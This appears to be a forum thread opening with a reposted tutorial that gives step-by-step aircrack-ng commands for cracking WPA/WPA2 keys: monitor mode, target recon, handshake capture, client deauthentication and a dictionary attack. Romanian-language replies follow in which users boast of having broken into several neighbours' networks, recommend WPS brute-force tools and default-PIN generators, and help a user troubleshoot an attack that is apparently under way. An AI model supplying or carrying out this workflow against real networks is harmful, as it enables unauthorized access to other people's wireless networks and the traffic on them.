Jump to content
Nytro

How To Crack A WPA Key With Aircrack-ng

Recommended Posts

Posted

[h=3]How To Crack A WPA Key With Aircrack-ng[/h]With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2

Step 1 : Setting up your network device

To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:

Command # iwconfig (to find all wireless network interfaces and their status)

1.JPG

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

2.JPG

Step 2 : Reconnaissance

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.

3.JPG

Step 3 : Capturing Packets

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 bssid AP_MAC -w data mon0

4.JPG

Step 4 : De-Authentication Technique

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.

5.JPG

So, now we have successfully acquired a WPA Handshake.

6-1.jpg

Step 5 : Cracking WPA/WAP2

Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.

Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

7.JPG

Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.

Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author

Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.

Sursa: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips

Posted

Spide, e acelasi procedeu. Mai sus te invata pas cu pas cum sa capturezi un handshake iar apoi sa faci brute force pe el, pe baza unui dictionar.

O alta metoda ar fi sa verifici daca are WPS-ul activat si sa faci un bruteforce pe acesta. Nu toate routerele au WPS activat, nu toate care il au activat merg supuse atacurilor, dar in cazurile favorabile parola iese mult mai repede.

Daca chiar vrei sa spargi vreo retea cu wpa/wpa2, cam astea ar fi metodele.

Posted
mersi nitro

astept sa fac bani de antena aia tplink parabolica si revin cu feedback

Asa credeam si eu, ca asta e singura solutie, pana mi-am bagat wifislax. Am spart deja 5 retele wireless in ultime 24 de ore, indiferent ca erau wep, wpa sau wpa2. Deci, poti sa spargi parolele bine-mersi si cu placa de retea a laptopului, doar tre sa stii cum.

Posted
Asa credeam si eu, ca asta e singura solutie, pana mi-am bagat wifislax. Am spart deja 5 retele wireless in ultime 24 de ore, indiferent ca erau wep, wpa sau wpa2. Deci, poti sa spargi parolele bine-mersi si cu placa de retea a laptopului, doar tre sa stii cum.

imi dai un sfat si miein privat^?

mersi frumos

Posted (edited)

Nu am ce sa ascund, iti instalezi wifislax, care este mult mai bun ca backtrack-ul in acest domeniu. GOYscript este ceva fantastic. GOYscript wep,wpa,wps face cam toata treaba. Mai este si WPSPinGenerator care iti da parola instant in cazul unor routere. Mai este si Inflator, dar GOYscript isi face treaba mai bine.

Edited by GarryOne
Posted

imi da o eroare :

oot@bt:~# airodump-ng -c 4 -bssid C8:3A:35:07:21:90 AP_MAC -w data mon0

Notice: You specified "-bssid". Did you mean "--bssid" instead?

yNotice: Channel range already given

"airodump-ng --help" for help.

root@bt:~# airodump-ng --bssid C8:3A:35:07:21:90 AP_MAC -w data mon0

"airodump-ng --help" for help.

root@bt:~#

ma poate ajuta vreo cineva? Multumesc anticipat.

Posted (edited)
imi da o eroare :

ma poate ajuta vreo cineva? Multumesc anticipat.

Ori folosesti -b ori --bssid, dar nici intr-un caz -bssid

Dar ca un sfat, mai bine folosesti GOYscript sau Reaver decat aircrack

vreo idee???

2sago6a.jpg

Nu gaseste nici o retea cu WPS activat

Edited by GarryOne
Posted

aceiasi prostie si cu -c

oot@bt:~# airodump-ng -c 4 -b C8:3A:35:07:21:90 AP_MAC -w data mon0

Notice: Channel range already given

"airodump-ng --help" for help.

root@bt:~#

scuze pt dublu post dar ma chinui de vreo 2 ore

Posted (edited)

In primul rand, e un notice, adica doar o atentionare, deci nu te afecteaza cu nimic, poti sa n-o bagi in seama. In al doilea rand trebuie sa citesti eroarea "channel already given" adica channel-ul e cunoscut deja, nu trebuie sa-l mai specifici.

Lasa aircrack-ul si instaleaza-ti modul-ul GOYscript (gasesti tutoriale pe net) sau iti bagi wifislax care are integrat toate astea, si doar alegi reteaua si GOYscript face toata treaba pentru tine. Mai poti incerca si cu WPSPinGenerator care iti da parola instant pentru unele routere care au pin-ul default.

Edited by GarryOne
Posted

Trebuie sa fii prin preajma unor retele wifi ca altfel cum vrei sa spargi tu? Cam 80% din routere au WPS activat, daca tie nu iti gaseste nici una, insaemna ca nu prea ai retele wifi in jurul tau. Incearca cu GOYscript WEP, poate ai retele wep. Eu am spart 2 retele wep, fiecare in 6 mintue cu GOYscript WEP.

Posted

tot nu reusesc sa obtin un handshake

H 4 ][ Elapsed: 11 mins ][ 2013-04-04 05:50

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C8:3A:35:07:21:90 -127 100 6805 550 1 4 54e. WPA2 CCMP PSK Sparge-ma

BSSID STATION PWR Rate Lost Frames Probe

C8:3A:35:07:21:90 48:5D:60:39:B4:6B -127 1e- 1 0 20636 Sparge-ma

05:46:27 Sending 64 directed DeAuth. STMAC: [48:5D:60:39:B4:6B] [ 2|58 ACKs]

ma deconecteaza, se conecteaza laptop-ul automat dar nu-mi da handshake

Posted (edited)

Nu stiu ce varianta beta de wifislax ai descarcat...ultima e beta 13.

Nu stiu ce placa wireless ai...dar nu-ti gaseste reteaua si clientul asociat ,fara de care nu poti obtine handshake !

Pe moment nu exista in continuare.

Ai aici un demo pentru goyscriptWPA:

Dar , daca e vorba de o retea ALICE...nu ai cautat pe siteurile italiene keygeneratoare pentru ALICE ?E in functie de MAC...

Chiar daca ai sa obtii handshake nu ai ce sa faci cu el in lipsa unui dictionar adecvat. Astea, in 99% din cazuri

raman cu key default.

Edited by sorelian

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...